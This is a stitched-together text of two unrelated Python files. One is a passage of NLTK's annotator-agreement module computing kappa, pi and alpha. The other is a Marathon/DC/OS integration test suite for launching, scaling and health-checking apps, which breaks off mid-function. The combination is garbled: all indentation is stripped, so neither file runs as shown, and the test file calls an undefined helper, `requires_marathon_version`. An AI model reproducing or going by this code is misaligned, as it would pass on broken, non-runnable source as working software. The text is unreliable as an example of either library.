comparison between the arguments.
The simplest way to initialize an AnnotationTask is with a list of triples,
each containing a coder's assignment for one object in the task:
task = AnnotationTask(data=[('c1', '1', 'v1'),('c2', '1', 'v1'),...])
Note that the data list needs to contain the same number of triples for each
individual coder, containing category values for the same set of items.
Alpha (Krippendorff 1980)
Kappa (Cohen 1960)
S (Bennett, Albert and Goldstein 1954)
Pi (Scott 1955)
TODO: Describe handling of multiple coders and missing data
Expected results from the Artstein and Poesio survey paper:
>>> from nltk.metrics.agreement import AnnotationTask
>>> import os.path
>>> t = AnnotationTask(data=[x.split() for x in open(os.path.join(os.path.dirname(__file__), "artstein_poesio_example.txt"))])
>>> t.avg_Ao()
0.88
>>> t.pi()
0.7995322418977615...
>>> t.S()
0.8199999999999998...
The following would have returned a wrong value (0.0) at commit @785fb79,
because the coders appear in the "wrong" order. All values for pi(), S(), and
kappa() would subsequently have been wrong, as they are computed from avg_Ao().
>>> t2 = AnnotationTask(data=[('b','1','stat'),('a','1','stat')])
>>> t2.avg_Ao()
1.0
The following, of course, also works.
>>> t3 = AnnotationTask(data=[('a','1','othr'),('b','1','othr')])
>>> t3.avg_Ao()
1.0
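A distance metric other than the default binary comparison can be supplied to
give partial credit for related labels. A minimal sketch (assuming set-valued
labels, as required by masi_distance):

    from nltk.metrics.distance import masi_distance
    task = AnnotationTask(data=[('c1', '1', frozenset(['v1'])),
                                ('c2', '1', frozenset(['v1', 'v2']))],
                          distance=masi_distance)
    task.avg_Ao()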
"""
from __future__ import print_function, unicode_literals, division
import logging
from itertools import groupby
from operator import itemgetter
from nltk.probability import FreqDist, ConditionalFreqDist
from nltk.internals import deprecated
from nltk.compat import python_2_unicode_compatible, iteritems
from nltk.metrics.distance import binary_distance
log = logging.getLogger(__file__)
@python_2_unicode_compatible
class AnnotationTask(object):
"""Represents an annotation task, i.e. people assign labels to items.
Notation tries to match notation in Artstein and Poesio (2007).
In general, coders and items can be represented as any hashable object.
Integers, for example, are fine, though strings are more readable.
Labels must support the distance functions applied to them, so e.g.
a string-edit-distance makes no sense if your labels are integers,
whereas interval distance needs numeric values. A notable case of this
is the MASI metric, which requires Python sets.
"""
def __init__(self, data=None, distance=binary_distance):
"""Initialize an empty annotation task.
"""
self.distance = distance
self.I = set()
self.K = set()
self.C = set()
self.data = []
if data is not None:
self.load_array(data)
def __str__(self):
return "\r\n".join(map(lambda x:"%s\t%s\t%s" %
(x['coder'], x['item'].replace('_', "\t"),
",".join(x['labels'])), self.data))
def load_array(self, array):
"""Load the results of annotation.
The argument is a list of 3-tuples, each representing a coder's labeling of an item:
(coder,item,label)
"""
for coder, item, labels in array:
self.C.add(coder)
self.K.add(labels)
self.I.add(item)
self.data.append({'coder':coder, 'labels':labels, 'item':item})
def agr(self, cA, cB, i, data=None):
"""Agreement between two coders on a given item
"""
data = data or self.data
# cfedermann: we don't know what combination of coder/item will come
# first in x; to avoid StopIteration problems due to assuming an order
# cA,cB, we allow either for k1 and then look up the missing as k2.
k1 = next((x for x in data if x['coder'] in (cA,cB) and x['item']==i))
if k1['coder'] == cA:
k2 = next((x for x in data if x['coder']==cB and x['item']==i))
else:
k2 = next((x for x in data if x['coder']==cA and x['item']==i))
ret = 1.0 - float(self.distance(k1['labels'], k2['labels']))
log.debug("Observed agreement between %s and %s on %s: %f",
cA, cB, i, ret)
log.debug("Distance between \"%r\" and \"%r\": %f",
k1['labels'], k2['labels'], 1.0 - ret)
return ret
def Nk(self, k):
return float(sum(1 for x in self.data if x['labels'] == k))
def Nik(self, i, k):
return float(sum(1 for x in self.data if x['item'] == i and x['labels'] == k))
def Nck(self, c, k):
return float(sum(1 for x in self.data if x['coder'] == c and x['labels'] == k))
@deprecated('Use Nk, Nik or Nck instead')
def N(self, k=None, i=None, c=None):
"""Implements the "n-notation" used in Artstein and Poesio (2007)
"""
if k is not None and i is None and c is None:
ret = self.Nk(k)
elif k is not None and i is not None and c is None:
ret = self.Nik(i, k)
elif k is not None and c is not None and i is None:
ret = self.Nck(c, k)
else:
raise ValueError("You must pass either i or c, not both! (k=%r,i=%r,c=%r)" % (k, i, c))
log.debug("Count on N[%s,%s,%s]: %d", k, i, c, ret)
return ret
def _grouped_data(self, field, data=None):
data = data or self.data
return groupby(sorted(data, key=itemgetter(field)), itemgetter(field))
def Ao(self, cA, cB):
"""Observed agreement between two coders on all items.
"""
data = self._grouped_data('item', (x for x in self.data if x['coder'] in (cA, cB)))
ret = sum(self.agr(cA, cB, item, item_data) for item, item_data in data) / len(self.I)
log.debug("Observed agreement between %s and %s: %f", cA, cB, ret)
return ret
def _pairwise_average(self, function):
"""
Calculates the average of function results for each coder pair
"""
total = 0
n = 0
s = self.C.copy()
for cA in self.C:
s.remove(cA)
for cB in s:
total += function(cA, cB)
n += 1
ret = total / n
return ret
def avg_Ao(self):
"""Average observed agreement across all coders and items.
"""
ret = self._pairwise_average(self.Ao)
log.debug("Average observed agreement: %f", ret)
return ret
def Do_alpha(self):
"""The observed disagreement for the alpha coefficient.
The alpha coefficient, unlike the other metrics, uses this rather than
observed agreement.
"""
total = 0.0
for i, itemdata in self._grouped_data('item'):
label_freqs = FreqDist(x['labels'] for x in itemdata)
for j, nj in iteritems(label_freqs):
for l, nl in iteritems(label_freqs):
total += float(nj * nl) * self.distance(l, j)
ret = (1.0 / (len(self.I) * len(self.C) * (len(self.C) - 1))) * total
log.debug("Observed disagreement: %f", ret)
return ret
def Do_Kw_pairwise(self, cA, cB, max_distance=1.0):
"""The observed disagreement for the weighted kappa coefficient.
"""
total = 0.0
data = (x for x in self.data if x['coder'] in (cA, cB))
for i, itemdata in self._grouped_data('item', data):
# we should have two items; distance doesn't care which comes first
total += self.distance(next(itemdata)['labels'],
next(itemdata)['labels'])
ret = total / (len(self.I) * max_distance)
log.debug("Observed disagreement between %s and %s: %f", cA, cB, ret)
return ret
def Do_Kw(self, max_distance=1.0):
"""Averaged over all labelers
"""
ret = self._pairwise_average(lambda cA, cB: self.Do_Kw_pairwise(cA, cB, max_distance))
log.debug("Observed disagreement: %f", ret)
return ret
# Agreement Coefficients
def S(self):
"""Bennett, Albert and Goldstein 1954
"""
Ae = 1.0 / len(self.K)
ret = (self.avg_Ao() - Ae) / (1.0 - Ae)
return ret
def pi(self):
"""Scott 1955; here, multi-pi.
Equivalent to K from Siegel and Castellan (1988).
"""
total = 0.0
label_freqs = FreqDist(x['labels'] for x in self.data)
for k, f in iteritems(label_freqs):
total += f ** 2
Ae = total / ((len(self.I) * len(self.C)) ** 2)
return (self.avg_Ao() - Ae) / (1 - Ae)
def Ae_kappa(self, cA, cB):
Ae = 0.0
nitems = float(len(self.I))
label_freqs = ConditionalFreqDist((x['labels'], x['coder']) for x in self.data)
for k in label_freqs.conditions():
Ae += (label_freqs[k][cA] / nitems) * (label_freqs[k][cB] / nitems)
return Ae
def kappa_pairwise(self, cA, cB):
"""
"""
Ae = self.Ae_kappa(cA, cB)
ret = (self.Ao(cA, cB) - Ae) / (1.0 - Ae)
log.debug("Expected agreement between %s and %s: %f", cA, cB, Ae)
return ret
def kappa(self):
"""Cohen 1960
Averages naively over kappas for each coder pair.
"""
return self._pairwise_average(self.kappa_pairwise)
def multi_kappa(self):
"""Davies and Fleiss 1982
Averages over observed and expected agreements for each coder pair.
"""
Ae = self._pairwise_average(self.Ae_kappa)
return (self.avg_Ao() - Ae) / (1.0 - Ae)
def alpha(self):
"""Krippendorff 1980
"""
De = 0.0
label_freqs = FreqDist(x['labels'] for x in self.data)
for j in self.K:
nj = label_freqs[j]
for l in self.K:
De += float(nj * label_freqs[l]) * self.distance(j, l)
De = (1.0 / (len(self.I) * len(self.C) * (len(self.I) * len(self.C) - 1))) * De
log.debug("Expected disagreement: %f", De)
ret = 1.0 - (self.Do_alpha() / De)
return ret
def weighted_kappa_pairwise(self, cA, cB, max_distance=1.0):
"""Cohen 1968
"""
total = 0.0
label_freqs = ConditionalFreqDist((x['coder'], x['labels'])
for x in self.data
if x['coder'] in (cA, cB))
for j in self.K:
for l in self.K:
total += label_freqs[cA][j] * label_freqs[cB][l] * self.distance(j, l)
De = total / (max_distance * pow(len(self.I), 2))
log.debug("Expected disagreement between %s and %s: %f", cA, cB, De)
Do = self.Do_Kw_pairwise(cA, cB)
ret = 1.0 - (Do / De)
return ret
def weighted_kappa(self, max_distance=1.0):
"""Cohen 1968
"""
return self._pairwise_average(lambda cA, cB: self.weighted_kappa_pairwise(cA, cB, max_distance))
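# A minimal usage sketch (illustrative only; the data values below are made
# up): build a tiny two-coder task and print a few of the coefficients
# defined above.
def _demo_coefficients():
    data = [('c1', '1', 'v1'), ('c2', '1', 'v1'),
            ('c1', '2', 'v1'), ('c2', '2', 'v2')]
    task = AnnotationTask(data=data)
    # The coders agree on item '1' and disagree on item '2'.
    print("avg_Ao:", task.avg_Ao())
    print("kappa:", task.kappa())
    print("alpha:", task.alpha())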
if __name__ == '__main__':
import re
import optparse
from nltk.metrics import distance
# process command-line arguments
parser = optparse.OptionParser()
parser.add_option("-d", "--distance", dest="distance", default="binary_distance",
help="distance metric to use")
parser.add_option("-a", "--agreement", dest="agreement", default="kappa",
help="agreement coefficient to calculate")
parser.add_option("-e", "--exclude", dest="exclude", action="append",
default=[], help="coder names to exclude (may be specified multiple times)")
parser.add_option("-i", "--include", dest="include", action="append", default=[],
help="coder names to include, same format as exclude")
parser.add_option("-f", "--file", dest="file",
help="file to read labelings from, each line with three columns: 'labeler item labels'")
parser.add_option("-v", "--verbose", dest="verbose", default='0',
help="how much debugging to print on stderr (0-4)")
parser.add_option("-c", "--columnsep", dest="columnsep", default="\t",
help="char/string that separates the three columns in the file, defaults to tab")
parser.add_option("-l", "--labelsep", dest="labelsep", default=",",
help="char/string that separates labels (if labelers can assign more than one), defaults to comma")
parser.add_option("-p", "--presence", dest="presence", default=None,
help="convert each labeling into 1 or 0, based on presence of LABEL")
parser.add_option("-T", "--thorough", dest="thorough", default=False, action="store_true",
help="calculate agreement for every subset of the annotators")
(options, remainder) = parser.parse_args()
if not options.file:
parser.print_help()
exit()
logging.basicConfig(level=50 - 10 * int(options.verbose))
# read in data from the specified file
data = []
with open(options.file, 'r') as infile:
for l in infile:
toks = l.split(options.columnsep)
coder, object_, labels = toks[0], str(toks[1:-1]), frozenset(toks[-1].strip().split(options.labelsep))
if ((options.include == options.exclude) or
(len(options.include) > 0 and coder in options.include) or
(len(options.exclude) > 0 and coder not in options.exclude)):
data.append((coder, object_, labels))
if options.presence:
task = AnnotationTask(data, getattr(distance, options.distance)(options.presence))
else:
task = AnnotationTask(data, getattr(distance, options.distance))
if options.thorough:
# TODO: agreement for every subset of the annotators is not implemented yet
pass
else:
print(getattr(task, options.agreement)())
logging.shutdown()
|
|
"""This module contains tests which are supposed to run on both root Marathon and Marathon on Marathon (MoM)."""
import apps
import common
import groups
import os
import os.path
import pytest
import requests
import retrying
import scripts
import time
import logging
import shakedown.dcos.service
from shakedown.clients import dcos_service_url, marathon
from shakedown.clients.authentication import dcos_acs_token, DCOSAcsAuth
from shakedown.clients.rpcclient import verify_ssl
from shakedown.dcos.agent import get_private_agents, private_agents, restart_agent
from shakedown.dcos.command import run_command_on_agent, run_command_on_master
from shakedown.dcos.cluster import dcos_version_less_than, dcos_1_8, dcos_1_9, dcos_1_11, dcos_1_12, ee_version # NOQA F401
from shakedown.dcos.file import copy_file_to_master
from shakedown.dcos.marathon import deployment_wait, marathon_version_less_than
from shakedown.dcos.master import master_http_service
from shakedown.dcos.agent import required_private_agents # NOQA F401
from shakedown.dcos.service import get_service_task
from shakedown.dcos.task import wait_for_dns
from shakedown.errors import DCOSException
from shakedown.matcher import assert_that, eventually, has_len, has_value, has_values, prop
from precisely import contains_string, equal_to, not_
logger = logging.getLogger(__name__)
def test_launch_mesos_container():
"""Launches a Mesos container with a simple command."""
app_def = apps.mesos_app(app_id='/mesos-container-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
app = client.get_app(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but only 1 was expected".format(len(tasks))
assert app['container']['type'] == 'MESOS', "The container type is not MESOS"
def test_launch_docker_container():
"""Launches a Docker container on Marathon."""
app_def = apps.docker_http_server(app_id='/launch-docker-container-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
app = client.get_app(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but only 1 was expected".format(len(tasks))
assert app['container']['type'] == 'DOCKER', "The container type is not DOCKER"
def test_launch_mesos_container_with_docker_image():
"""Launches a Mesos container with a Docker image."""
app_def = apps.ucr_docker_http_server(app_id='/launch-mesos-container-with-docker-image-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
assert_that(lambda: client.get_tasks(app_id),
eventually(has_len(equal_to(1)), max_attempts=30))
app = client.get_app(app_id)
assert app['container']['type'] == 'MESOS', "The container type is not MESOS"
# This fails on DC/OS 1.7; the version of Marathon in Universe for 1.7 is likely 1.1.5.
@dcos_1_8
def test_launch_mesos_grace_period(marathon_service_name):
"""Tests 'taskKillGracePeriodSeconds' option using a Mesos container in a Marathon environment.
Read more details about this test in `test_root_marathon.py::test_launch_mesos_root_marathon_grace_period`
"""
app_id = '/mesos-grace-period-app'
app_def = apps.mesos_app(app_id)
default_grace_period = 3
grace_period = 20
app_def['fetch'] = [{"uri": "https://downloads.mesosphere.com/testing/test.py"}]
app_def['cmd'] = '/opt/mesosphere/bin/python test.py'
app_def['taskKillGracePeriodSeconds'] = grace_period
task_name = app_id.lstrip('/')
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
client.scale_app(app_id, 0)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
# tasks should still be here after the default_grace_period
time.sleep(default_grace_period + 1)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
# but not after the set grace_period
time.sleep(grace_period)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is None
def test_launch_docker_grace_period(marathon_service_name):
"""Tests 'taskKillGracePeriodSeconds' option using a Docker container in a Marathon environment.
Read more details about this test in `test_root_marathon.py::test_launch_mesos_root_marathon_grace_period`
"""
app_id = '/launch-docker-grace-period-app'
app_def = apps.docker_http_server(app_id)
app_def['container']['docker']['image'] = 'kensipe/python-test'
default_grace_period = 3
grace_period = 20
app_def['taskKillGracePeriodSeconds'] = grace_period
app_def['cmd'] = 'python test.py'
task_name = app_id.lstrip('/')
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
client.scale_app(app_id, 0)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
# tasks should still be here after the default_grace_period
time.sleep(default_grace_period + 1)
tasks = get_service_task(marathon_service_name, task_name)
assert tasks is not None
# but not after the set grace_period
time.sleep(grace_period)
assert_that(lambda: get_service_task(marathon_service_name, task_name),
eventually(equal_to(None), max_attempts=30))
def test_docker_port_mappings():
"""Tests that Docker ports are mapped and are accessible from the host."""
app_def = apps.docker_http_server(app_id='/docker-port-mapping-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
host = tasks[0]['host']
port = tasks[0]['ports'][0]
cmd = r'curl -s -w "%{http_code}"'
cmd = cmd + ' {}:{}/.dockerenv'.format(host, port)
status, output = run_command_on_agent(host, cmd)
assert status and output == "200", "HTTP status code is {}, but 200 was expected".format(output)
def test_docker_dns_mapping(marathon_service_name):
"""Tests that a running Docker task is accessible via DNS."""
app_def = apps.docker_http_server(app_id='/docker-dns-mapping-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
bad_cmd = 'ping -c 1 docker-test.marathon-user.mesos-bad'
status, output = run_command_on_master(bad_cmd)
assert not status
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_dns():
dnsname = '{}.{}.mesos'.format(app_id.lstrip('/'), marathon_service_name)
cmd = 'ping -c 1 {}'.format(dnsname)
wait_for_dns(dnsname)
status, output = run_command_on_master(cmd)
assert status, "ping failed for app using DNS lookup: {}".format(dnsname)
check_dns()
def test_launch_app_timed():
"""Most tests wait until a task is launched with no reference to time.
This test verifies that when an app is launched on Marathon, a task is spawned within seconds (at most ~10, as checked below).
"""
app_def = apps.mesos_app(app_id='/timed-launch-app')
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
# if not launched in 10 sec fail
assert_that(lambda: client.get_tasks(app_id),
eventually(has_len(equal_to(1)), max_attempts=10))
def test_ui_available(marathon_service_name):
"""Simply verifies that a request to the UI endpoint is successful if Marathon is launched."""
auth = DCOSAcsAuth(dcos_acs_token())
response = requests.get("{}/ui/".format(dcos_service_url(marathon_service_name)), auth=auth, verify=verify_ssl())
assert response.status_code == 200, "HTTP status code is {}, but 200 was expected".format(response.status_code)
def test_task_failure_recovers():
"""Tests that if a task is KILLED, another one will be launched with a different ID."""
app_def = apps.sleep_app(app_id='/task-failure-recovers')
app_def['cmd'] = 'sleep 1000'
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
old_task_id = tasks[0]['id']
host = tasks[0]['host']
common.kill_process_on_host(host, '[s]leep 1000')
assert_that(lambda: client.get_tasks(app_id)[0],
eventually(has_value('id', not_(equal_to(old_task_id))), max_attempts=30))
@pytest.mark.skipif("ee_version() == 'strict'")
def test_run_app_with_specified_user():
"""Runs an app with a given user (cnetos). CentOS is expected, since it has centos user by default."""
app_def = apps.sleep_app(app_id='/app-with-specified-user')
app_def['user'] = 'centos'
app_id = app_def['id']
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
task = tasks[0]
assert task['state'] == 'TASK_RUNNING', "The task is not running: {}".format(task['state'])
app = client.get_app(app_id)
assert app['user'] == 'centos', "The app's user is not centos: {}".format(app['user'])
@pytest.mark.skipif("ee_version() == 'strict'")
def test_run_app_with_non_existing_user():
"""Runs an app with a non-existing user, which should be failing."""
app_def = apps.sleep_app(app_id='/non-existing-user')
app_def['user'] = 'bad'
client = marathon.create_client()
client.add_app(app_def)
assert_that(lambda: client.get_app(app_def["id"]), eventually(
prop(['lastTaskFailure', 'message'], contains_string("No such user 'bad'")), max_attempts=30))
def test_run_app_with_non_downloadable_artifact():
"""Runs an app with a non-downloadable artifact."""
app_def = apps.sleep_app(app_id='/non-downloadable-artifact')
app_def['fetch'] = [{"uri": "http://localhost/missing-artifact"}]
client = marathon.create_client()
client.add_app(app_def)
assert_that(lambda: client.get_app(app_def["id"]), eventually(
prop(['lastTaskFailure', 'message'], contains_string("Failed to fetch all URIs for container")), max_attempts=30)) # NOQA E501
def test_launch_group():
"""Launches a group of 2 apps."""
group_def = groups.sleep_group()
groups_id = group_def["groups"][0]["id"]
app_id = group_def["groups"][0]["apps"][0]["id"]
client = marathon.create_client()
client.create_group(group_def)
deployment_wait(service_id=app_id)
group_apps = client.get_group(groups_id)
apps = group_apps['apps']
assert len(apps) == 2, "The numbers of apps is {} after deployment, but 2 is expected".format(len(apps))
@private_agents(2)
def test_launch_and_scale_group():
"""Launches and scales a group."""
group_def = groups.sleep_group()
groups_id = group_def["groups"][0]["id"]
app1_id = group_def["groups"][0]["apps"][0]["id"]
app2_id = group_def["groups"][0]["apps"][1]["id"]
client = marathon.create_client()
client.create_group(group_def)
deployment_wait(service_id=app1_id)
group_apps = client.get_group(groups_id)
apps = group_apps['apps']
assert len(apps) == 2, "The number of apps is {}, but 2 was expected".format(len(apps))
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 1, "The number of tasks #1 is {} after deployment, but 1 was expected".format(len(tasks1))
assert len(tasks2) == 1, "The number of tasks #2 is {} after deployment, but 1 was expected".format(len(tasks2))
# scale by 2 for the entire group
client.scale_group(groups_id, 2)
deployment_wait(service_id=app1_id)
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 2, "The number of tasks #1 is {} after scale, but 2 was expected".format(len(tasks1))
assert len(tasks2) == 2, "The number of tasks #2 is {} after scale, but 2 was expected".format(len(tasks2))
@private_agents(2)
def test_scale_app_in_group():
"""Scales an individual app in a group."""
group_def = groups.sleep_group()
groups_id = group_def["groups"][0]["id"]
app1_id = group_def["groups"][0]["apps"][0]["id"]
app2_id = group_def["groups"][0]["apps"][1]["id"]
client = marathon.create_client()
client.create_group(group_def)
deployment_wait(service_id=app1_id)
group_apps = client.get_group(groups_id)
apps = group_apps['apps']
assert len(apps) == 2, "The number of apps is {}, but 2 was expected".format(len(apps))
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 1, "The number of tasks #1 is {} after deployment, but 1 was expected".format(len(tasks1))
assert len(tasks2) == 1, "The number of tasks #2 is {} after deployment, but 1 was expected".format(len(tasks2))
# scaling just one app in the group
client.scale_app(app1_id, 2)
deployment_wait(service_id=app1_id)
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 2, "The number of tasks #1 is {} after scale, but 2 was expected".format(len(tasks1))
assert len(tasks2) == 1, "The number of tasks #2 is {} after scale, but 1 was expected".format(len(tasks2))
@private_agents(2)
def test_scale_app_in_group_then_group():
"""First scales an app in a group, then scales the group itself."""
group_def = groups.sleep_group()
groups_id = group_def["groups"][0]["id"]
app1_id = group_def["groups"][0]["apps"][0]["id"]
app2_id = group_def["groups"][0]["apps"][1]["id"]
client = marathon.create_client()
client.create_group(group_def)
deployment_wait(service_id=app1_id)
group_apps = client.get_group(groups_id)
apps = group_apps['apps']
assert len(apps) == 2, "The number of apps is {}, but 2 was expected".format(len(apps))
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 1, "The number of tasks #1 is {} after deployment, but 1 was expected".format(len(tasks1))
assert len(tasks2) == 1, "The number of tasks #2 is {} after deployment, but 1 was expected".format(len(tasks2))
# scaling just one app in the group
client.scale_app(app1_id, 2)
deployment_wait(service_id=app1_id)
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 2, "The number of tasks #1 is {} after scale, but 2 was expected".format(len(tasks1))
assert len(tasks2) == 1, "The number of tasks #2 is {} after scale, but 1 was expected".format(len(tasks2))
deployment_wait(service_id=app1_id)
# scaling the group after one app in the group was scaled
client.scale_group(groups_id, 2)
deployment_wait(service_id=app1_id)
tasks1 = client.get_tasks(app1_id)
tasks2 = client.get_tasks(app2_id)
assert len(tasks1) == 4, "The number of tasks #1 is {} after scale, but 4 was expected".format(len(tasks1))
assert len(tasks2) == 2, "The number of tasks #2 is {} after scale, but 2 was expected".format(len(tasks2))
def assert_app_healthy(client, app_def, health_check):
app_def['healthChecks'] = [health_check]
instances = app_def['instances']
app_id = app_def["id"]
logger.info('Testing {} health check protocol.'.format(health_check['protocol']))
client.add_app(app_def)
deployment_wait(service_id=app_id, max_attempts=300)
app = client.get_app(app_id)
assert app['tasksRunning'] == instances, \
"The number of running tasks is {}, but {} was expected".format(app['tasksRunning'], instances)
assert app['tasksHealthy'] == instances, \
"The number of healthy tasks is {}, but {} was expected".format(app['tasksHealthy'], instances)
@dcos_1_9
@pytest.mark.parametrize('protocol', ['HTTP', 'MESOS_HTTP', 'TCP', 'MESOS_TCP'])
def test_http_health_check_healthy(protocol):
"""Tests HTTP, MESOS_HTTP, TCP and MESOS_TCP health checks against a web-server in Python."""
app_def = apps.http_server()
client = marathon.create_client()
assert_app_healthy(client, app_def, common.health_check(protocol=protocol))
def test_app_with_no_health_check_not_healthy():
"""Makes sure that no task is marked as healthy if no health check is defined for the corresponding app."""
app_def = apps.sleep_app()
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
app = client.get_app(app_id)
assert app['tasksRunning'] == 1, \
"The number of running tasks is {}, but 1 was expected".format(app['tasksRunning'])
assert app['tasksHealthy'] == 0, \
"The number of healthy tasks is {}, but 0 was expected".format(app['tasksHealthy'])
def test_command_health_check_healthy():
"""Tests COMMAND health check"""
app_def = apps.sleep_app()
client = marathon.create_client()
assert_app_healthy(client, app_def, common.command_health_check())
@dcos_1_9
@pytest.mark.parametrize('protocol', ['HTTPS', 'MESOS_HTTPS'])
def test_https_health_check_healthy(protocol):
"""Tests HTTPS and MESOS_HTTPS health checks using a prepared nginx image that enables
SSL (using self-signed certificate) and listens on 443.
"""
# marathon version captured here will work for root and mom
requires_marathon_version('1.4.2')
client = marathon.create_client()
app_def = apps.docker_nginx_ssl()
assert_app_healthy(client, app_def, common.health_check(protocol=protocol, port_index=1))
@dcos_1_12
def test_https_readiness_check_ready():
"""Tests HTTPS readiness check using a prepared nginx image that enables
SSL (using self-signed certificate) and listens on 443.
"""
client = marathon.create_client()
app_def = apps.app_with_https_readiness_checks()
app_id = app_def["id"]
client.add_app(app_def)
# when readiness check keeps failing, the deployment will never finish
deployment_wait(service_id=app_id, max_attempts=300)
def test_failing_health_check_results_in_unhealthy_app():
"""Tests failed health checks of an app. The health check is meant to never pass."""
app_def = apps.http_server()
app_def['healthChecks'] = [common.health_check('/bad-url', 'HTTP', failures=0, timeout=3)]
client = marathon.create_client()
client.add_app(app_def)
assert_that(lambda: client.get_app(app_def["id"]), eventually(
has_values(tasksRunning=1, tasksHealthy=0, tasksUnhealthy=1), max_attempts=30))
@private_agents(2)
def test_task_gets_restarted_due_to_network_split():
"""Verifies that a health check fails in presence of a network partition."""
app_def = apps.http_server("app-network-split")
app_id = app_def["id"]
app_def['healthChecks'] = [common.health_check()]
common.pin_to_host(app_def, common.ip_other_than_mom())
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
app = client.get_app(app_id)
assert app['tasksRunning'] == 1, \
"The number of running tasks is {}, but 1 was expected".format(app['tasksRunning'])
assert app['tasksHealthy'] == 1, \
"The number of healthy tasks is {}, but 1 was expected".format(app['tasksHealthy'])
tasks = client.get_tasks(app_id)
task_id = tasks[0]['id']
host = tasks[0]['host']
port = tasks[0]['ports'][0]
# introduce a network partition
common.block_iptable_rules_for_seconds(host, port, sleep_seconds=10, block_input=True, block_output=False)
# Network partition should cause the task to restart N times until the partition is resolved (since we
# pinned the task to the split agent). A new task with a new taskId should eventually be running and healthy.
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_health_message():
tasks = client.get_tasks(app_id)
new_task_id = tasks[0]['id']
assert task_id != new_task_id, "The task has not been restarted: {}".format(task_id)
app = client.get_app(app_id)
assert app['tasksRunning'] == 1, \
"The number of running tasks is {}, but 1 was expected".format(app['tasksRunning'])
assert app['tasksHealthy'] == 1, \
"The number of healthy tasks is {}, but 1 was expected".format(app['tasksHealthy'])
check_health_message()
def test_health_check_works_with_resident_task():
"""Verifies that resident tasks (common for Persistent Volumes) do not fail health checks.
Marathon bug: https://jira.mesosphere.com/browse/MARATHON-7050
"""
app_def = apps.resident_docker_app()
app_id = app_def["id"]
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id, max_attempts=500)
tasks = client.get_tasks(app_def["id"])
assert len(tasks) == 1, "The number of tasks is {}, but 1 was expected".format(len(tasks))
assert_that(lambda: client.get_app(app_def['id']), eventually(has_value('tasksHealthy', 1), max_attempts=30))
@private_agents(2)
def test_pinned_task_scales_on_host_only():
"""Tests that a pinned app scales only on the pinned node."""
app_def = apps.sleep_app()
app_id = app_def["id"]
host = common.ip_other_than_mom()
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 1, "The number of tasks is {} after deployment, but 1 was expected".format(len(tasks))
assert tasks[0]['host'] == host, \
"The task is on {}, but it is supposed to be on {}".format(tasks[0]['host'], host)
client.scale_app(app_id, 10)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
assert len(tasks) == 10, "The number of tasks is {} after scale, but 10 was expected".format(len(tasks))
for task in tasks:
assert task['host'] == host, "The task is on {}, but it is supposed to be on {}".format(task['host'], host)
@private_agents(2)
def test_pinned_task_recovers_on_host():
"""Tests that when a pinned task gets killed, it recovers on the node it was pinned to."""
app_def = apps.sleep_app()
app_id = app_def["id"]
host = common.ip_other_than_mom()
common.pin_to_host(app_def, host)
client = marathon.create_client()
client.add_app(app_def)
deployment_wait(service_id=app_id)
tasks = client.get_tasks(app_id)
common.kill_process_on_host(host, '[s]leep')
deployment_wait(service_id=app_id)
@retrying.retry(wait_fixed=1000, stop_max_attempt_number=30, retry_on_exception=common.ignore_exception)
def check_for_new_task():
new_tasks = client.get_tasks(app_id)
assert tasks[0]['id'] != new_tasks[0]['id'], "The task did not get killed: {}".format(tasks[0]['id'])
assert new_tasks[0]['host'] == host, \
"The task got restarted on {}, but it was supposed to stay on {}".format(new_tasks[0]['host'], host)
check_for_new_task()
@private_agents(2)
def test_pinned_task_does_not_scale_to_unpinned_host():
"""Tests when a task lands on a pinned node (and barely fits) and it is asked to scale past
the resources of that node, no tasks will be launched on any other node.
"""
app_def = apps.sleep_app()
app_id = app_def['id']
host = common.ip_other_than_mom()
logger.info('Constraint set to host: {}'.format(host))
# The CPU requirement is designed to exceed half of the node's cores,
# so that only one task can land on the node.
cores = common.cpus_on_agent(host)
